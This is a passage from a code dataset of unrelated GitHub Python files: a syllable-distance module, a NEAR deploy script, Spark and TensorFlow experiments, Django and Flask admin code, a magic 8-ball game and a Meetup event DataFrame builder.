s1, s2)\n #return statistics.mean([on_distance, gl_distance])\n\n glide1 = self.syllables[s1]['syllable'][1]\n glide2 = self.syllables[s2]['syllable'][1]\n\n return statistics.mean([on_distance, gl_distance])\n # if glide1 != '' and glide2 != '':\n # return on_distance + (gl_distance/2)\n # elif glide1 == '' and glide2 == '':\n # return on_distance\n # else:\n # return on_distance + (gl_distance * 2)\n\n def rime_distance(self, s1, s2):\n nuc_distance = self._slot_distance('nucleus', s1, s2)\n cod_distance = self._slot_distance('coda', s1, s2)\n\n coda1 = self.syllables[s1]['syllable'][3]\n coda2 = self.syllables[s2]['syllable'][3]\n\n return statistics.mean([nuc_distance, cod_distance])\n # if coda1 != '' and coda2 != '':\n # #return statistics.mean([nuc_distance, cod_distance])\n # return nuc_distance + cod_distance\n # elif coda1 == '' and coda2 == '':\n # return nuc_distance + (cod_distance/3)\n # else:\n # #return statistics.mean([nuc_distance, (cod_distance)])\n # return nuc_distance + (cod_distance * 2)\n\n # on1 = self._get_slot('onset', s1)\n # on2 = self._get_slot('onset', s2)\n #\n # gl1 = self._get_slot('glide', s1)\n # gl2 = self._get_slot('glide', s2)\n #\n # ons = [on1, on2]\n # gls = [gl1, gl2]\n # syl1 = [on1, gl1]\n # syl2 = [on2, gl2]\n # all_slots = [on1, on2, gl1, gl2]\n #\n # if not self._any_slots(all_slots):\n # # RULE 1\n # return 0\n # elif self._all_slots(all_slots):\n # # RULE 2\n # return self._compound_onset(on1, gl1, on2, gl2)\n # elif self._all_slots(ons) and not self._any_slots(gls):\n # # RULE 3\n # return self._compute_distance(on1, on2)\n # elif\n\n\n\n # # elif self._all_slots(gls) and not self._any_slots(ons):\n # # # RULE 4\n # # return self._compute_distance(gl1, gl2)\n # elif self._all_slots(syl1) or self._all_slots(syl2):\n # if not self._any_slots(syl1) or not self._any_slots(syl2):\n # # RULE 5\n # return self._compound_onset(on1, gl1, on2, gl2)\n # elif not self._all_slots(gls):\n # # RULE 6\n # return 
self._compound_onset(on1, gl1, on2, gl2)\n\n\n # elif self._all_slots(syl1):\n # if not self._any_slots(syl2):\n # # RULE 5\n # # ALL OF SYL1 / NONE OF SYL2\n # elif self._any_slots(syl2):\n # # RULE 6\n # # ALL OF SYL1 / ONE OF SYL2\n # elif self._all_slots(syl2):\n # if not self._any_slots(syl1):\n # # RULE 7\n # # ALL OF SYL2 / NONE OF SYL1\n # elif self._any_slots(syl1):\n # # RULE 8\n # # ALL OF SYL2 / ONE OF SYL1\n\n # def _compound_onset(self, on1, gl1, on2, gl2):\n # on_distance = self._compute_distance(on1, on2)\n # gl_distance = self._conpute_distance(gl1, gl2)\n # return on_distance + gl_distance\n #\n # def _get_slot(self, slot, syllable):\n # return self.syllables[syllable][slot]\n #\n # def _any_slots(self, slots):\n # return any(True if x != [0,0,0] else False for x in slots)\n #\n # def _all_slots(self, slots):\n # return all(True if x != [0,0,0] else False for x in slots)\n\n # def all_distances(self, s1, s2):\n # return ([\n # self.slot_distance('onset', s1, s2),\n # self.slot_distance('glide', s1, s2),\n # self.slot_distance('nucleus', s1, s2),\n # self.slot_distance('coda', s1, s2),\n # self.slot_distance('tone', s1, s2)\n # ])\n\n def syllable_distance(self, s1, s2):\n decimal.getcontext().prec = 5\n # distances = self.all_distances(s1, s2)\n # distances = [Decimal(x) for x in distances]\n\n onset = self.onset_distance(s1, s2)\n rime = self.rime_distance(s1, s2)\n tone = self._slot_distance('tone', s1, s2)\n return float(sum([onset, rime, tone]))\n\n def _compute_distance(self, l1, l2):\n decimal.getcontext().prec = 5\n if type(l1) is list:\n return float((\n decimal.getcontext().power((Decimal(l2[0]) - Decimal(l1[0])), 2)\n + decimal.getcontext().power((Decimal(l2[1]) - Decimal(l1[1])), 2)\n + decimal.getcontext().power((Decimal(l2[2]) - Decimal(l1[2])), 2)\n ).sqrt())\n else:\n return float(decimal.getcontext().abs(Decimal(l1) - Decimal(l2)))\n # val = float(decimal.getcontext().abs(Decimal(l1) - Decimal(l2)))\n # print('{}, {} = {}'.format(Decimal(l1), Decimal(l2), val))\n # return val\n\ndef load_syllables():\n syllables_file = pathlib.Path('data/revsyllables.json')\n with syllables_file.open('r', encoding='utf-8') as f:\n return _Syllables(json.load(f))\n\nunihan = load_unihan()\n# print(len(unihan))\n#\ncedict, cedictchars = load_cedict()\n# print(len(cedict))\n# print(len(cedictchars))\n\nhsk = load_hsk()\n# print(len(hsk))\n# print(len(hsk['word']))\n# print(len(hsk['char']))\n\nsubtlex = load_subtlex()\n# print(len(subtlex['char']))\n# print(len(subtlex['word']))\n\nradicals = load_radicals()\n\nsyllables = load_syllables()\n","repo_name":"NickAnderegg/hanzi-orthophonology","sub_path":"handata.py","file_name":"handata.py","file_ext":"py","file_size_in_byte":17034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"7080034109","text":"#!/usr/bin/env python3\n\nimport sys\nfrom pathlib import Path\n\nsys.path.insert(0, str(Path(__file__).parent.parent.joinpath(\"tests\")))\n\nimport os\nfrom setup_localnet import setup_core_contracts\n\nPROJECT_ROOT = Path(__file__).parent.parent.resolve()\n\n\ndef main() -> None:\n near_home = Path(\n os.environ.get(\"NEAR_HOME\", PROJECT_ROOT.joinpath(\".data/near/localnet\"))\n )\n state_file = near_home / \"setup-contracts\"\n if state_file.exists():\n return\n setup_core_contracts(near_home, node_port=33300)\n state_file.write_text(\"OK\")\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"DDeAlmeida/kuutamod","sub_path":"scripts/deploy-contracts.py","file_name":"deploy-contracts.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"1695229818","text":"import os\r\nfrom utility.Config import *\r\nfrom utility.Spark import *\r\nfrom utility.utils import *\r\n\r\n\r\nclass DataExploration:\r\n def __init__(self):\r\n self.spark = get_spark_session(\"hdsdsdsd\")\r\n self.filename = updated_filename\r\n self.df_target = read_csv(self.filename)\r\n # self.del_file() \r\n\r\n def calculate_temperature_average(self):\r\n # smart_194_raw is temperation SMART Statistic\r\n # self.df_target = self.df_target\\\r\n # .groupBy([\"MFG\",\"model\"])\\\r\n # .agg(round(mean(\"smart_194_raw\"),2).alias(\"avg_Temp\"))\\\r\n # .orderBy(\"avg_Temp\") \r\n # self.df_target.show()\r\n self.correlation_temp_failure(self.df_target) \r\n \r\n def correlation_temp_failure(self,df):\r\n get_all_maker_corr = df.groupBy(\"model\").agg(\r\n corr(\"smart_194_raw\",\"failure\").alias(\"correlation\")).collect() \r\n\r\n for row in get_all_maker_corr:\r\n print(row[\"MFG\"],\":\",row[\"correlation\"])\r\n\r\n \r\n \r\n\r\n","repo_name":"riahtu/predictive_maintenance-2","sub_path":"utility/DataExploration.py","file_name":"DataExploration.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"31647806800","text":"from django.contrib import admin\n\nfrom .models import Employee, Parameter, Employee_Para\n\n\nclass Employee_ParaAdmin(admin.ModelAdmin):\n fieldsets = [\n (None, {'fields': ['employee','parameter','weightage','score']}),\n ('Month information', {'fields': ['pub_month'], 'classes': ['collapse']}),\n ]\n\n\n\n\nadmin.site.register(Employee)\nadmin.site.register(Parameter)\nadmin.site.register(Employee_Para, Employee_ParaAdmin)\n# Register your models here.\n","repo_name":"ambersingh/performance","sub_path":"perform/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"18888036504","text":"#-*- coding: utf-8 -*-\nfrom django.shortcuts import render\nfrom quadratic.forms import QuadraticForm\n\n\ndef quadratic_results(request):\n content = {}\n if request.GET:\n form = QuadraticForm(request.GET)\n if form.is_valid():\n data = form.cleaned_data\n var_a = data['a']\n var_b = data['b']\n var_c = data['c']\n d = var_b**2 - 4*var_a*var_c\n content['d'] = d\n if d == 0:\n content['x1'] = round(float((-var_b + d ** (1/2.0))/ 2.0*var_a))\n elif d > 0:\n content['x1'] = round(float((-var_b + d ** (1/2.0))/ 2.0*var_a))\n content['x2'] = round(float((-var_b - d ** (1/2.0))/ 2.0*var_a))\n else:\n content['x1'] = ''\n else:\n form = QuadraticForm()\n content['form'] = form\n return render(request, \"results.html\", content)\n","repo_name":"Kovekser/Pybursa_project","sub_path":"quadratic/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"24077589885","text":"\"\"\"\nObjects controller.\n\"\"\"\nfrom typing import Any, Optional\nfrom flask import Blueprint, request, abort, render_template, flash, redirect\nfrom project.decorators.security_decorators import login_required\nfrom project.decorators.context_decorators import 
process_context\nfrom project.entities.object_entity import ObjectEntity\nfrom project.models.object_model import ObjectModel\nfrom project.utils import record_utils\nfrom project.utils.data_utils import set_properties_value\nfrom project.utils.ctrl_utils import generate_admin_url\nfrom project.services import history_service\nfrom project.services import object_service\nfrom project.enums import object_enum\nfrom project.enums import string_types_enum as str_type\nfrom project.enums import table_enum\nimport json\n\n\n# Blueprint data\nblueprint = Blueprint(\n name='admin_objects_ctrl',\n import_name=__name__,\n url_prefix='//admin/objects'\n)\n\n\n###############################################################################\n# View Routes\n###############################################################################\n\n\n@blueprint.route(\n rule='/',\n methods=['GET'],\n defaults={'object_name': None}\n)\n@blueprint.route(\n rule='/',\n methods=['GET']\n)\n@login_required()\n@process_context()\ndef list_objects_view(context: str, object_name: Optional[str] = None\n ) -> Any:\n \"\"\"\n List content view endpoint.\n \"\"\"\n root_url = generate_admin_url(context, 'objects')\n back_url = generate_admin_url(\n context, 'objects'\n )\n change_order_url = generate_admin_url(\n context, 'objects', 'change_order', object_name if object_name else '',\n )\n referrer_url = request.referrer\n headers = [\n '#',\n 'Name',\n 'Type',\n 'Published',\n 'URL',\n 'Created On',\n 'Edit',\n 'Children',\n ]\n objects: list[ObjectEntity] = list()\n children: list[ObjectModel] = list()\n data: list[Any] = list()\n title = 'Root'\n parent_name = None\n\n # Get record and data\n if object_name is not None:\n entity = object_service.select_by_name(context, object_name)\n if not entity:\n return abort(400)\n record = object_service.get_record_by_name(entity.object_type)\n if not record:\n return abort(400)\n if entity.reference_name:\n parent = object_service.select_by_name(\n context, entity.reference_name\n )\n if not parent:\n return abort(400)\n parent_name = parent.name\n back_url = generate_admin_url(\n context, 'objects', parent.name,\n )\n title = entity.name\n children = object_service.get_records_by_names(record.children)\n objects = object_service.select_by_reference(context, entity.name)\n else:\n children = object_service.get_root_records()\n objects = object_service.select_root_objects(context)\n\n # Filter children\n children = [child for child in children if child.allow_actions]\n\n # Parse entities\n for entity in objects:\n record = object_service.get_record_by_name(entity.object_type)\n if record is None:\n continue\n\n published = entity.properties.get('published', '1') == str_type.TRUE\n if record.is_content and published:\n url = f'{entity.url}'\n else:\n url = '-'\n\n data.append((\n entity.object_order,\n f' '\n f'{entity.name}',\n f'{record.name}',\n f' True ' if published else 'False',\n url,\n entity.created_on,\n f' '\n f'Edit',\n f' '\n f'Children'\n ))\n\n # Render template\n return render_template(\n '/admin/object_list.html',\n page_data=dict(\n object_name=object_name,\n headers=headers,\n data=data,\n root_url=root_url,\n referrer_url=referrer_url,\n title=title,\n children=children,\n back_url=back_url,\n parent_name=parent_name,\n change_order_url=change_order_url,\n )\n )\n\n\n@blueprint.route(\n rule='/change_order',\n methods=['GET'],\n defaults={'object_name': None}\n)\n@blueprint.route(\n rule='/change_order/',\n 
methods=['GET']\n)\n@login_required()\n@process_context()\ndef change_order_view(context: str, object_name: Optional[str] = None\n ) -> Any:\n \"\"\"\n Change order view endpoint.\n \"\"\"\n back_url = generate_admin_url(\n context, 'objects'\n )\n action_url = generate_admin_url(\n context, 'objects', 'save_order'\n )\n referrer_url = request.referrer\n objects: list[ObjectEntity] = list()\n data: list[Any] = list()\n title = 'Root'\n\n # Get record and data\n if object_name is not None:\n back_url = generate_admin_url(\n context, 'objects', object_name,\n )\n title = object_name\n objects = object_service.select_by_reference(context, object_name)\n else:\n objects = object_service.select_root_objects(context)\n\n # Parse entities\n for entity in objects:\n object_type = object_service.get_record_by_name(\n entity.object_type\n )\n if not object_type:\n continue\n data.append({\n \"id\": entity.id,\n \"order\": entity.object_order,\n \"name\": f' {entity.name}',\n \"type\": object_type.name\n })\n\n # Render template\n return render_template(\n '/admin/object_order_list.html',\n page_data=dict(\n object_name=object_name,\n data=data,\n referrer_url=referrer_url,\n title=title,\n back_url=back_url,\n action_url=action_url,\n )\n )\n\n\n@blueprint.route(\n rule='//create',\n methods=['GET'],\n defaults={'reference_name': None}\n)\n@blueprint.route(\n rule='//create/',\n methods=['GET']\n)\n@login_required()\n@process_context()\ndef create_view(context: str, object_type: str,\n reference_name: Optional[str] = None) -> Any:\n \"\"\"\n Render create page.\n \"\"\"\n record = object_service.get_record_by_name(object_type)\n referrer_url = request.referrer\n if not record:\n return abort(400)\n\n back_url = generate_admin_url(\n context, 'objects'\n )\n action_url = generate_admin_url(\n context, 'objects', 'create'\n )\n if reference_name is not None:\n parent = object_service.select_by_name(context, reference_name)\n if parent:\n back_url = generate_admin_url(\n context, 'objects', parent.name\n )\n action_url = generate_admin_url(\n context, 'objects', 'create', reference_name\n )\n\n return render_template(\n '/admin/object_form.html',\n page_data=dict(\n context=context,\n object_id=None,\n edit=False,\n object_type=object_type,\n title=object_type,\n action_url=action_url,\n back_url=back_url,\n properties=record.properties,\n allow_actions=record.allow_actions,\n referrer_url=referrer_url,\n reference_name=reference_name,\n )\n )\n\n\n@blueprint.route(\n rule='/edit/',\n methods=['GET']\n)\n@login_required()\n@process_context()\ndef edit_view(context: str, object_id: int) -> Any:\n \"\"\"\n Render edit page.\n \"\"\"\n # Get entity and record\n entity = object_service.select_by_id(object_id)\n if not entity:\n return abort(400)\n\n record = object_service.get_record_by_name(entity.object_type)\n if not record:\n return abort(400)\n\n # URLs\n back_url = generate_admin_url(\n context, 'objects',\n )\n action_url = generate_admin_url(\n context, 'objects', 'edit', str(object_id)\n )\n if entity.reference_name:\n parent = object_service.select_by_name(\n context, entity.reference_name\n )\n if parent:\n back_url = generate_admin_url(\n context, 'objects', parent.name\n )\n\n # Set props\n props = set_properties_value(getattr(record, 'properties'), entity)\n history = history_service.select_by_target_id(\n context, table_enum.OBJECTS, object_id,\n )\n\n # Render\n return render_template(\n '/admin/object_form.html',\n page_data=dict(\n context=context,\n object_id=object_id,\n edit=True,\n 
object_type=entity.object_type,\n title=entity.object_type,\n back_url=back_url,\n action_url=action_url,\n properties=props,\n history=history,\n name=entity.name,\n allow_actions=record.allow_actions,\n )\n )\n\n\n###############################################################################\n# Action Routes\n###############################################################################\n\n\n@blueprint.route(\n rule='//create',\n methods=['POST']\n)\n@login_required()\n@process_context()\ndef create_action(context: str, object_type: str) -> Any:\n \"\"\"\n Insert content to database.\n \"\"\"\n data = request.form.to_dict()\n root_url = generate_admin_url(\n context, 'objects', object_type,\n )\n new_object = ObjectEntity(\n context=context,\n name=data['name'],\n properties=data,\n object_type=object_type,\n )\n try:\n entity_id = object_service.insert(new_object)\n flash('Content created successfully!', category='success')\n return redirect(f'{root_url}/edit/{entity_id}')\n except Exception as err:\n flash(str(err), category='danger')\n return redirect(request.referrer)\n\n\n@blueprint.route(\n rule='/edit/',\n methods=['POST']\n)\n@login_required()\n@process_context()\ndef edit_action(context: str, object_id: int) -> Any:\n \"\"\"\n Update content in database.\n \"\"\"\n data = request.form.to_dict()\n root_url = generate_admin_url(\n context, 'objects',\n )\n try:\n object_service.update(object_id, data)\n flash('Content updated successfully!', category='success')\n return redirect(f'{root_url}/edit/{object_id}')\n except Exception as err:\n flash(str(err), category='danger')\n return redirect(request.referrer)\n\n\n@blueprint.route(\n rule='/delete/',\n methods=['GET']\n)\n@login_required()\n@process_context()\ndef delete_action(context: str, object_id: int) -> Any:\n \"\"\"\n Delete content from database.\n \"\"\"\n root_url = generate_admin_url(\n context, 'objects',\n )\n try:\n object_service.delete(object_id)\n flash(f'Content {object_id} sent to trash bin', category='success')\n return redirect(root_url)\n except Exception as err:\n flash(str(err), category='danger')\n return redirect(request.referrer)\n\n\n@blueprint.route(\n rule='/duplicate///',\n methods=['GET']\n)\n@login_required()\n@process_context()\ndef duplicate_action(context: str, object_id: int, to_context: str,\n new_name: str) -> Any:\n \"\"\"\n Duplicate content.\n \"\"\"\n root_url = generate_admin_url(\n context, 'objects',\n )\n try:\n object_service.duplicate(object_id, to_context, new_name)\n flash('Content duplicated successfully!', category='success')\n return redirect(root_url)\n except Exception as err:\n flash(str(err), category='danger')\n return redirect(request.referrer)\n\n\n@blueprint.route(\n rule='/save_order',\n methods=['POST']\n)\n@login_required()\n@process_context()\ndef save_order_action(context: str) -> Any:\n \"\"\"\n Save order endpoint.\n \"\"\"\n data = request.form.to_dict()\n json_data: list[dict[str, Any]] = json.loads(data['json_data'])\n try:\n for item in json_data:\n object_service.update_order(\n int(item['id']), int(item['object_order'])\n )\n flash('Order updated successfully!', category='success')\n return redirect(data['back_url'])\n except Exception as err:\n flash(str(err), category='danger')\n return redirect(request.referrer)\n\n\n###############################################################################\n# Ajax Routes\n###############################################################################\n\n\n@blueprint.route(\n rule='/exists/',\n 
methods=['GET']\n)\n@login_required()\ndef object_exists(context: str, name: str) -> Any:\n \"\"\"\n Verify if object exists.\n \"\"\"\n exists = object_service.object_exists(\n context, name\n )\n return dict(exists=exists)\n","repo_name":"vinibiavatti1/PythonFlaskCms","sub_path":"project/controllers/admin/objects_ctrl.py","file_name":"objects_ctrl.py","file_ext":"py","file_size_in_byte":13155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"20828605329","text":"import tensorflow as tf\nimport numpy as np\nimport argparse\nimport random\nimport args\nimport sys\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nFLAGS = args.get()\n\ndef generate_dataset(num):\n train_data_list = []\n data_list = []\n label_list = []\n for i in range(num):\n r = np.random.normal()\n t = np.random.uniform(0, np.pi * 2)\n\n data = np.array([[r*np.cos(t), r*np.sin(t)]])\n label = np.array([[1, 0]])\n data_list.append(data)\n label_list.append(label)\n\n data = np.array([[(r+5)*np.cos(t), (r+5)*np.sin(t)]])\n label = np.array([[0, 1]])\n data_list.append(data)\n label_list.append(label)\n\n train_data_list = [data_list, label_list]\n\n \"\"\"\n fig, ax = plt.subplots(nrows=1, ncols=1)\n ax.set_xlabel('1st column')\n ax.set_ylabel('2nd column')\n ax.set_title('Classification')\n\n for i in range(num):\n if label_list[i][0,0] == 1:\n ax.plot(data_list[i][0,0], data_list[i][0,1], 'C0o')\n elif label_list[i][0,1] == 1:\n ax.plot(data_list[i][0,0], data_list[i][0,1], 'C9o')\n\n fig.savefig('task1-test.png')\n plt.close(fig)\n sys.exit(-1)\n \"\"\"\n\n return train_data_list\n\ndef shuffle_dataset(dataset_list, label_list):\n l = list(zip(dataset_list, label_list))\n random.shuffle(l)\n dataset_list_ , label_list_ = zip(*l)\n\n return dataset_list_, label_list_\n\ndef build_model():\n x = tf.placeholder(tf.float32, shape=[None, 2])\n y_label = tf.placeholder(tf.float32, shape=[None, 2])\n\n w_0 = tf.Variable(tf.truncated_normal([2, 20], stddev=0.01))\n b_0 = tf.Variable(tf.constant(0.1, shape=[20]))\n h_0 = tf.nn.relu(tf.matmul(x, w_0) + b_0)\n\n w_1 = tf.Variable(tf.truncated_normal([20, 2], stddev=0.01))\n b_1 = tf.Variable(tf.constant(0.1, shape=[1]))\n h_1 = tf.nn.softmax(tf.matmul(h_0, w_1) + b_1)\n\n y = h_1\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels = y_label, logits = y)\n\n return x, y, h_0, y_label, cross_entropy\n\ndef get_batch(train_dataset, index, batch_num):\n #if len(train_dataset) < index * args.batch_num\n margin = (index + 1) * batch_num - len(train_dataset[0])\n if margin > 0:\n batch_data = train_dataset[0][index * batch_num : len(train_dataset)]\n batch_data.append(train_dataset[0][0:margin])\n a = np.array(batch_data)\n #batch_data.concatenate(batch_data, train_dataset[0][0: margin])\n batch_label = train_dataset[1][index * batch_num : len(train_dataset)]\n batch_data.append(train_dataset[1][0:margin])\n else:\n batch_data = train_dataset[0][index * batch_num : (index + 1) * FLAGS.batch_num]\n batch_label = train_dataset[1][index * batch_num : (index + 1) * FLAGS.batch_num]\n\n batch_data_arr = np.squeeze(np.array(batch_data), axis = 1)\n batch_label_arr = np.squeeze(np.array(batch_label), axis = 1)\n\n #print(batch_data_arr.shape, batch_label_arr.shape)\n\n return batch_data_arr, batch_label_arr\n\n #return [np.array(batch_data).squeeze(reshape(len(batch_data), 2), np.array(batch_label).reshape(len(batch_data), 2)]\n\ndef main(not_parsed_args):\n if len(not_parsed_args) > 1:\n 
print(\"Unknown args:%s\" % not_parsed_args)\n exit()\n\n #dataset generation\n train_dataset = generate_dataset(FLAGS.train_dataset_num)\n valid_dataset = generate_dataset(FLAGS.valid_dataset_num)\n test_dataset = generate_dataset(FLAGS.test_dataset_num)\n\n #build model\n x, y, h_0, y_label, cross_entropy = build_model()\n optimizer = tf.train.AdamOptimizer(FLAGS.initial_lr).minimize(cross_entropy)\n\n correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_label, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n #training\n for i in range(FLAGS.epoch):\n shuffle_dataset(train_dataset[0], train_dataset[1])\n\n for j in range(int(len(train_dataset[0]) / FLAGS.batch_num)):\n batch = get_batch(train_dataset, j, FLAGS.batch_num)\n _ = sess.run([optimizer], feed_dict={x: batch[0], y_label: batch[1]})\n\n #print(batch[0].shape)\n\n if j%50==49:\n valid_data_arr = np.array(valid_dataset[0])\n valid_label_arr = np.array(valid_dataset[1])\n valid_data_arr = np.squeeze(valid_data_arr, axis=1)\n valid_label_arr = np.squeeze(valid_label_arr, axis=1)\n accuracy_train = sess.run(accuracy, feed_dict={x: batch[0], y_label: batch[1]})\n accuracy_valid = sess.run(accuracy, feed_dict={x: valid_data_arr, y_label: valid_label_arr})\n print(\"epoch: %d, step: %d, train-accuracy: %.3f valid-accuracy: %.3f\"%(i+1, j+1, accuracy_train, accuracy_valid))\n\n\n #test image plot\n test_data_arr = np.array(test_dataset[0])\n test_label_arr = np.array(test_dataset[1])\n test_data_arr = np.squeeze(test_data_arr, axis=1)\n test_label_arr = np.squeeze(test_label_arr, axis=1)\n\n test_output,accuracy_ = sess.run([y, accuracy], feed_dict={x: test_data_arr, y_label: test_label_arr})\n print(\"test-accuracy: %.3f\"%(accuracy_))\n\n\n hidden_layer_output = sess.run(h_0, feed_dict={x: test_data_arr, y_label: test_label_arr})\n #print(hidden_layer_output.shape)\n\n #line plotting (active region, inactive region)\n line_x_inactive = [[] for x in range(np.size(hidden_layer_output, 1))]\n line_y_inactive = [[] for x in range(np.size(hidden_layer_output, 1))]\n line_x_active = [[] for x in range(np.size(hidden_layer_output, 1))]\n line_y_active= [[] for x in range(np.size(hidden_layer_output, 1))]\n\n #hidden_layer_sum = np.sum(hidden_layer_output, axis=1)\n #print(hidden_layer_sum.shape)\n\n for i in range(np.size(hidden_layer_output, 0)):\n for j in range(np.size(hidden_layer_output, 1)):\n if hidden_layer_output[i][j] == 0:\n line_x_inactive[j].append(test_data_arr[i][0])\n line_y_inactive[j].append(test_data_arr[i][1])\n else:\n line_x_active[j].append(test_data_arr[i][0])\n line_y_active[j].append(test_data_arr[i][1])\n \"\"\"\n for i in range(np.size(test_output, 0)):\n if test_output[i, 0] - test_output[i, 1] > -0.01 and test_output[i, 0] - test_output[i, 1] < 0.01:\n line_x_inactive.append(test_data_arr[i][0])\n line_y_inactive.append(test_data_arr[i][1])\n\n \"\"\"\n\n #test point plotting\n for i in range(np.size(hidden_layer_output, 1)):\n fig, ax = plt.subplots(nrows=1, ncols=1)\n ax.set_xlabel('1st column')\n ax.set_ylabel('2nd column')\n ax.set_title('Boundary')\n\n ax.plot(line_x_inactive[i], line_y_inactive[i], 'ro')\n ax.plot(line_x_active[i], line_y_active[i], 'bo')\n\n fig.savefig('task1-active-inactive-{}.png'.format(i))\n plt.close(fig)\n\n fig, ax = plt.subplots(nrows=1, ncols=1)\n ax.set_xlabel('1st column')\n ax.set_ylabel('2nd column')\n ax.set_title('Classification')\n\n for i in 
range(np.size(test_output, 0)):\n if test_output[i, 0] > test_output[i, 1]:\n ax.plot(test_data_arr[i][0], test_data_arr[i][1], 'ro')\n elif test_output[i, 0] < test_output[i, 1]:\n ax.plot(test_data_arr[i][0], test_data_arr[i][1], 'bo')\n #ax.plot(line_x_inactive, line_y_inactive, 'og-')\n\n fig.savefig('task1-classify.png')\n plt.close(fig)\n\nif __name__ == '__main__':\n tf.app.run()\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"githjh/EE488","sub_path":"project1-hhyeo/project1_task1.py","file_name":"project1_task1.py","file_ext":"py","file_size_in_byte":7819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"24329624192","text":"import random\n\nname = input(\"What is your name? \")\nquestion = input(\"What is your question? (Preferably make it a yes no question) \")\nrng = random.randint(1, 9)\nif rng == 1:\n answer = \"Yes - definitely.\"\nelif rng == 2:\n answer = \"It is decidedly so.\"\nelif rng == 3:\n answer = \"Without a doubt.\"\nelif rng == 4:\n answer = \"Reply hazy, try again.\"\nelif rng == 5:\n answer = \"Ask again later.\"\nelif rng == 6:\n answer = \"Better not tell you now.\"\nelif rng == 7:\n answer = \"My sources say no.\"\nelif rng == 8:\n answer = \"Outlook not so good.\"\nelif rng == 9:\n answer = \"Very doubtful.\"\nelse:\n answer = \"Error: Number is not within the range specified or is a float\"\n\n#print(question == None)\n\n# If no question is put in, it will ask for a question\nif question == \"\":\n print(\"You Need To Ask A Question!\")\nelif name == \"\":\n print(\"Question: \" + question)\n print(\"Magic 8-Ball's answer: \" + answer)\nelse:\n print(name + \" asks: \" + question)\n print(\"Magic 8-Ball's answer: \" + answer)","repo_name":"Pulucas/Learning-Python","sub_path":"magic8.py","file_name":"magic8.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"70430359990","text":"import requests\nimport json\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime\nfrom pyspark.sql import functions as F\nfrom pyspark.sql import types as T\nfrom pyspark.sql.functions import udf\n\n\nclass Event:\n\n def __init__(self, spark, data, geocode, *args, **kwargs):\n self.spark = spark\n self.data = data\n self.geocode = geocode\n\n def build_df(self, *args, **kwargs):\n \"\"\"\n Build a SparkDataframe based on json response.\n Args:\n Spark (object): Spark Session\n data (json array): Event data from meetup api\n\n \"\"\"\n\n columns = ['id', 'date', 'year', 'month', 'day', 'country', 'city', 'state,', 'address',\n 'meetup_name', 'meetup_group_name', 'description', 'event_url', 'yes_rsvp_count', 'status']\n id, date, year, month, day, country, city, state, address, meetup_name, meetup_group_name, description, event_url, yes_rsvp_count, status = ([\n ] for i in range(15))\n\n # Iterate over events\n for label in self.data:\n date_event = datetime.fromtimestamp(label['time'] / 1000.0)\n\n id.append(label['id'])\n date.append(date_event)\n year.append(date_event.year)\n month.append(date_event.month)\n day.append(date_event.year)\n\n if label.get('venue'):\n country.append(label['venue'].get('country'))\n city.append(label['venue'].get('city'))\n state.append(label['venue'].get('state'))\n address.append(label['venue'].get('address_1'))\n else:\n location_json = self.geocode.reverse_geocode(\n label['group'].get('group_lat'), label['group'].get('group_lon'))\n 
country.append(location_json[0]['components'].get('country_code'))\n city.append(location_json[0]['components'].get('city'))\n state.append(location_json[0]['components'].get('state'))\n address.append(location_json[0].get('formatted'))\n\n meetup_name.append(label.get('name'))\n meetup_group_name.append(label['group'].get('name'))\n description.append(label.get('description'))\n event_url.append(label['event_url'])\n yes_rsvp_count.append(label.get('yes_rsvp_count'))\n status.append(label.get('status'))\n\n # Schema Structure\n schema = T.StructType([\n T.StructField(\"id\", T.StringType(), True),\n T.StructField(\"date\", T.TimestampType(), True),\n T.StructField(\"year\", T.IntegerType(), True),\n T.StructField(\"month\", T.IntegerType(), True),\n T.StructField(\"day\", T.IntegerType(), True),\n T.StructField(\"country\", T.StringType(), True),\n T.StructField(\"city\", T.StringType(), True),\n T.StructField(\"state\", T.StringType(), True),\n T.StructField(\"address\", T.StringType(), True),\n T.StructField(\"meetup_name\", T.StringType(), True),\n T.StructField(\"meetup_group_name\", T.StringType(), True),\n T.StructField(\"description\", T.StringType(), True),\n T.StructField(\"event_url\", T.StringType(), True),\n T.StructField(\"yes_rsvp_count\", T.IntegerType(), True),\n T.StructField(\"status\", T.StringType(), True)\n ])\n\n df_pandas = pd.DataFrame(np.transpose([id, date, year, month, day, country, city, state, address,\n meetup_name, meetup_group_name, description, event_url, yes_rsvp_count, status]), columns=columns)\n\n df = self.spark.createDataFrame(df_pandas, schema=schema)\n\n upper_udf = udf(lambda x: x.upper())\n\n # UDF: Remove tags from description column\n @udf\n def remove_tags_udf(text):\n import re\n TAG_RE = re.compile(r\"<[^>]+>\")\n return TAG_RE.sub('', text)\n\n # # Apply udf functions\n df_upper = df.withColumn('country', upper_udf(df.country))\n df_tags = df_upper.withColumn('description', remove_tags_udf(df_upper.description))\n\n return df_tags\n\n @staticmethod\n def write_df(df):\n df.write.format(\"com.mongodb.spark.sql.DefaultSource\").mode(\"append\").option(\n \"database\", \"meetup\").option(\"collection\", 